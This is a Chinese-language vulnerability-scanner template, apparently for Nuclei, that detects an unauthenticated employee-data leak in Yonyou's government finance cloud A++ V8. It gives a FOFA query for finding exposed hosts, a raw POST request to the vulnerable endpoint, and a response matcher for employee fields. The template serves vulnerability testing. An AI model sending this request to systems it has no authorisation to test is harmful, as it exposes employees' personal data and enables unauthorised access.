id: yonyouzhengwucaiwuyun-a-v8-seletmaemplistforprscalc-Information-Disclosure

info:
  name: 用友政务财务云A++ V8 /ma/emp/api/seletMaEmpListForPrsCalc 敏感信息泄露
  author: HuanXiong
  severity: medium
  description: |-
    fofa: app="用友-政务财务系统"
    用友政务财务云A++ V8 /ma/emp/api/seletMaEmpListForPrsCalc 接口存在未授权访问漏洞，攻击者无需身份认证即可访问该接口获取系统中的员工信息，造成敏感信息泄露。
  reference:
    - 
  tags: information-disclosure, yonyou, zwxt

http:
  - raw:
      - |-
        POST /ma/emp/api/seletMaEmpListForPrsCalc HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/json
        Accept-Encoding: gzip
        Connection: close

        {"pageNum":1,"pageSize":1}

    matchers:
      - type: dsl
        name: 信息泄露
        dsl:
          - "status_code == 200 && contains_all(body, 'rmwyid', 'empName', 'empCode')"